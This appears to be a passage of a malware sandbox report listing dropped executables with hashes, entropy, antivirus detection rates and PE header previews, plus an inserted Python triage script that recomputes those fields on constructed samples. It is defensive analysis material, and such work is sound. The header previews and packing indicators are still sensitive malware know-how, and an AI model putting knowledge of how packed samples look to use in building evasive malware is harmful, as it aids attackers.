                                                                                                            SHA-256:F6E52C6DFAEB03E2D0AF3A4C41111580BB9783D7E9B8D5AF75644E84CD429D1D
                                                                                                            SHA-512:479D5119E66E51345436BB6311D342A36039961A7A37129BE6AF9E23EDA33F42C1EAAB2DCAC3A01B33F8A473BA2C773AA8F840D88AF6B9D1FD19EADAED0719CE
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ................................................................................\.......f..|.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................W.}..... ......;z............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.\.......O..|....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.11267307713306338
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:f/lTXm/Ey6q9995abOL1miM3qQ10nMCldimE8eawHza1miIl/:3lKl68k61tMLyMCldzE9BHza1tIl/
                                                                                                            MD5:7B28FA88D1E22EC7DB348008C787F608
                                                                                                            SHA1:8E5BE4EF718FAD2722F84787388AA48A0C010D96
                                                                                                            SHA-256:EA8CA5EE6AD32D729B991484A4E48FE308EDA7D6BC0C6E91FB63D84DF3D7253B
                                                                                                            SHA-512:9CF77D6FA866211F06E4FA296A567D8FE6914DE065F830AD725268FA0D238B20F25040ACBCF5298E340E12ABF3FCA25C84B86AEA055CD9DFB4E88CC6F9A9B82D
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ................................................................................\.......b..|.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................W.}..... .....5.s............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.\..........|....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.11272810934557069
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:AuTXm/Ey6q9995ajL1mK2P3qQ10nMCldimE8eawHza1mKRP/:/Kl68QL1iPLyMCldzE9BHza11/
                                                                                                            MD5:C6EE22D81C57583D05F2D3770AA07F2F
                                                                                                            SHA1:EDD0CF3C45CCDC26681C28B1512DC7AE4C291CA3
                                                                                                            SHA-256:AC595BDD3D34C82BB67344DC1143EEF8CC6D1D049C6A2F4A25EC7F78EE0BF03E
                                                                                                            SHA-512:2E8BCB7CFA7ACB98047ECDF6401B40FC930562E3EE09D4623C59570DCFBA905A01384338A8EA268C2643A9ED4C70B648EAE83B2F8FB66A8C6192B25EF1C4787F
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ................................................................................\.......0..|.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................W.}..... .......i............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.\.......<..|....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\14F6.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):356864
                                                                                                            Entropy (8bit):7.848740173602419
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:P5aWbksiNTB6VcYEL6MQU9KKqmUhZiZs3lyiFiznt804G+YCN+0ORduk:P5atNTQVcYE9KKqfziZs3EznX4mCN+0Y
                                                                                                            MD5:1A92A9C5ED159ED0914F2E4570661A15
                                                                                                            SHA1:46E7A169436AE366758CB3C01A40552CD59C0AEE
                                                                                                            SHA-256:F3AA18EC1D6075E859622E8AF114DF28939EB5414CC8B0F0094B43B0C55D1DE8
                                                                                                            SHA-512:428A91128D57EE07198A1494CFF8047C8F4F47916920259B81188680A0C99D4AB7F7447271EAB99A414D956255332E23969BE32314714283E8655DAC985A383C
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\27E3.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3576320
                                                                                                            Entropy (8bit):7.9976863291960605
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                            MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                            SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                            SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                            SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
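Each record above lists the same triage fields for a dropped file: size, 8-bit entropy, an Encrypted flag, MD5/SHA1/SHA-256/SHA-512 and a preview of the first bytes. Read together they are already informative: 27E3.exe has entropy 7.9977 and is flagged Encrypted, while 14F6.exe at 7.8487 is not, and the 27E3.exe preview shows section names .28gybOo and .adata next to .rsrc instead of the usual .text/.rdata/.data set, which is what a packer or crypter typically leaves behind. The script below is an added example, not Joe Sandbox code and not derived from the samples on this page: it recomputes those fields for an arbitrary file and walks the PE section table to flag non-standard section names. The entropy threshold and the STANDARD_SECTIONS list are assumptions chosen for the example (the page only bounds the threshold between 7.8487 and 7.9977), and the two PE images it analyses are constructed inline so it runs offline.

```python
import hashlib
import math
import struct
from dataclasses import dataclass, field

# ASSUMPTION for this example: entropy at or above this value is reported as
# "Encrypted". The page itself only fixes the range: 27E3.exe (7.9977) is
# flagged, 14F6.exe (7.8487) is not, so any cut-off in between matches it.
HIGH_ENTROPY_THRESHOLD = 7.9

# Section names a stock linker emits; anything else (".28gybOo", ".adata",
# UPX0/UPX1, ...) deserves a second look. Illustrative list, not exhaustive.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT", ".gfids"}


@dataclass
class Triage:
    size: int
    entropy: float
    encrypted: bool
    md5: str
    sha1: str
    sha256: str
    sha512: str
    is_pe: bool
    sections: list = field(default_factory=list)
    odd_sections: list = field(default_factory=list)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 (constant) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(data: bytes) -> tuple:
    """Walk MZ -> e_lfanew -> "PE\\0\\0" -> COFF header -> section table.
    Returns (is_pe, [section names]); a missing or truncated header gives (False, [])."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False, []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False, []
    coff = e_lfanew + 4                       # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size              # section table follows the optional header
    names = []
    for i in range(num_sections):
        off = table + i * 40                  # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break                             # truncated table: keep what was readable
        names.append(data[off:off + 8].rstrip(b"\0").decode("latin-1"))
    return True, names


def triage(data: bytes) -> Triage:
    """Recompute the per-file fields the report lists for a dropped file."""
    ent = shannon_entropy(data)
    is_pe, names = pe_sections(data)
    return Triage(
        size=len(data),
        entropy=ent,
        encrypted=ent >= HIGH_ENTROPY_THRESHOLD,
        md5=hashlib.md5(data).hexdigest().upper(),
        sha1=hashlib.sha1(data).hexdigest().upper(),
        sha256=hashlib.sha256(data).hexdigest().upper(),
        sha512=hashlib.sha512(data).hexdigest().upper(),
        is_pe=is_pe,
        sections=names,
        odd_sections=[n for n in names if n not in STANDARD_SECTIONS],
    )


def build_sample_pe(section_names, payload: bytes) -> bytes:
    """Constructed test input: a minimal, non-runnable PE32 skeleton (DOS header,
    PE signature, COFF header, zeroed optional header, section table) plus payload."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    opt = bytes(224)                                            # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, len(opt), 0x102)
    table = b"".join(n.encode("ascii").ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + opt + table + payload


# Constructed samples: a "packed" image whose body is uniformly distributed and
# carries renamed sections, and a plain image whose body is repetitive text.
PACKED_SAMPLE = build_sample_pe([".rsrc", ".28gybOo", ".adata"], bytes(range(256)) * 256)
PLAIN_SAMPLE = build_sample_pe([".text", ".rdata", ".data", ".rsrc"],
                               b"This program cannot be run in DOS mode.\r\n" * 200)


if __name__ == "__main__":
    for label, blob in (("packed", PACKED_SAMPLE), ("plain", PLAIN_SAMPLE)):
        t = triage(blob)
        print(f"{label}: size={t.size} entropy={t.entropy:.4f} encrypted={t.encrypted} "
              f"pe={t.is_pe} sections={t.sections} odd={t.odd_sections} sha256={t.sha256}")
```

Run it against a real drop with `triage(open(path, "rb").read())`; the hashes should match the report's values exactly, and the entropy to the printed precision. An entropy near 8.0 combined with non-standard section names is a packing indicator, not a verdict: the unpacked payload is what the Yara hits in the signature list are matching, so the next step is memory dumping rather than static analysis of the file on disk.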
                                                                                                            C:\Users\user\AppData\Local\Temp\411E.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):301056
                                                                                                            Entropy (8bit):5.192330972647351
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                            MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                            SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                            SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                            SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: Metadefender, Detection: 46%
                                                                                                            • Antivirus: ReversingLabs, Detection: 77%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\433C.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):905216
                                                                                                            Entropy (8bit):7.399713113456654
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: Metadefender, Detection: 34%
                                                                                                            • Antivirus: ReversingLabs, Detection: 77%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\53A8.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:MS-DOS executable
                                                                                                            Category:dropped
                                                                                                            Size (bytes):557664
                                                                                                            Entropy (8bit):7.687250283474463
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                            MD5:6ADB5470086099B9169109333FADAB86
                                                                                                            SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                            SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                            SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                            C:\Users\user\AppData\Local\Temp\53DC.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):320000
                                                                                                            Entropy (8bit):6.687125826295423
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:+WbLfFa4xe0ga5Pvt8Cta8wm/jso47Qtgi5aR8vuz+sGfeqK:+SFes5PvHtayQoDtgpR8vuy6
                                                                                                            MD5:4E806C42B23B043FA7409D108EECAADB
                                                                                                            SHA1:39D29853690F371FB690D427D34EACE3946B6553
                                                                                                            SHA-256:847FD5A4CAE442AFC596F09B8A8F2DE13BC85356DCD8B897A3B4A89081F5046F
                                                                                                            SHA-512:24DA5692EE3AFBBC71D62CBBAC33BB094E326E0FA3F234C580C7A994F1C47A768AD1579F9652BF2B7174541C0E447BBD5952F8457F3CBC3B4BD9613B165D7332
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S..S..S......S....g.S..](..S..R...S.....S......S......S.Rich.S.........PE..L...m.h_..........................................@.................................u_..........................................(......................................................................@...............H............................text...V........................... ..`.data...............................@....tad................................@....lux................................@....civujo.............................@....rsrc..............................@..@.reloc..\F.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\656C.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):356864
                                                                                                            Entropy (8bit):7.8500958922173165
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:P5aWbksiNTBQlCuchwPuVbIn97yYUdL6TVrp/LbU7LY6TzeWJwN:P5atNTqlCl84wJyYUpUrLbU9SWJwN
                                                                                                            MD5:FEB8ADD569247306CB0271C907607238
                                                                                                            SHA1:BB9353D602A82FF174AFE7574F4AFD6009E2A8B0
                                                                                                            SHA-256:E7587776ADECF859E137E7AF3DA4B9B6FD9428E6F89CC48D3A63886D490BAACA
                                                                                                            SHA-512:6F650A1D44A11B2205E59DC915E244AC43988C7AC32972280CC5C5CA1ED668B683C2B06F61AEF8D2E91CE1C83FC4E0788207023B6CA81372ACDB4935F0402689
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 28%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\7480.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3595648
                                                                                                            Entropy (8bit):7.997561940529216
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:98304:a084oJCztB83FsWOotbBDtRexIIJFzGfb7Wgyp5:a084RxEFsWHD90Ia5
                                                                                                            MD5:7BD7AFEFAC0B988373D1CDB929602689
                                                                                                            SHA1:75760C800B95B61EB2F0E4C4D27667C05DB52619
                                                                                                            SHA-256:D50B018DBE38F8FF4FD5DDA66F03830B2208ADAF0FF43E8F2D965CC25E20B7E4
                                                                                                            SHA-512:FD30725AB5CD93BA1DDDD1761894993A8B858144C32BA301529695DCF05DC495EA91CA1A0D43C2ADB8C7397320E5D40626A9E19524A6B678294D7B5BFEA4BC8C
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S.....?.6.....................................|.O. ....pM...............6..#................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@............C...P......................@.............1.........................@....rsrc........pM......p0.............@....HQIHSjN......O.......2.............@....adata........S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\D54.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):373760
                                                                                                            Entropy (8bit):6.990411328206368
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                                            MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                                            SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                                            SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                                            SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                             • Antivirus: Metadefender, Detection: 29%
                                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\E6C4.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):322560
                                                                                                            Entropy (8bit):6.703621223316465
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:RZO3M89ge8ZiiVaOcOCgireB6RgkO4/hzNzGf+GP6f:RZagD5Vovvr9RgA/hZEPa
                                                                                                            MD5:C94FBEF580C7CD0BA874360D0B997F22
                                                                                                            SHA1:6533AF2DAEB72A2E9C8E52194052C1444E203DB1
                                                                                                            SHA-256:19CEF530181D49F24A3513EE5546BF69A12482F66466DB0D8A5C45DA206BE569
                                                                                                            SHA-512:89C0270B8239624F7F2FD1D1D26BC1A5DBBCD7397908230FBA5F80DE69326BC9F52A488EF1D53BD227AB22346484445846A89322224574E02837D04A3BDA511D
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S..S..S......S....g.S..](..S..R...S.....S......S......S.Rich.S.........PE..L....._..........................................@.................................x.......................................4...(......................................................................@...............H............................text............................... ..`.data...............................@....zufow..............................@....ruh................................@....yilub..............................@....rsrc............... ..............@..@.reloc..fF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\F4CF.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):319488
                                                                                                            Entropy (8bit):6.687273736877821
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:H9ccaRn35MCCXxwaUbmV/nCEHF1qgkruPOaZUGfa5:H+9PMtwFUfCG1qglPOSG
                                                                                                            MD5:50BADD524B2E3FAF0FF050DD5BE8A584
                                                                                                            SHA1:E03B18A84F9926BB68D23D993A859FF0BA6B0BDE
                                                                                                            SHA-256:B3396E7D185C1CA1FAD9A33382ECE95F9DC5CEBCC8E259F7D16A94D4DB74CF21
                                                                                                            SHA-512:F892699F20B1965277B3D594073C2903A40F8C611D9CC467826E9D33F0A9AD315C0CDC4458595F440EB7DB6C9FB70587B7702D8DAB508A26248BE6F674F1D271
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S..S..S......S....g.S..](..S..R...S.....S......S......S.Rich.S.........PE..L.....h_..........................................@............................................................................(......................................................................@...............H............................text...F........................... ..`.data...............................@....gemuta.............................@....yid................................@....yofuyiz............................@....rsrc..............................@..@.reloc..\F.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\FD6B.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:modified
                                                                                                            Size (bytes):537088
                                                                                                            Entropy (8bit):5.840438491186833
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                            MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                            SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                            SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                            SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                            C:\Users\user\AppData\Local\Temp\FE11.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):905216
                                                                                                            Entropy (8bit):7.399713113456654
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
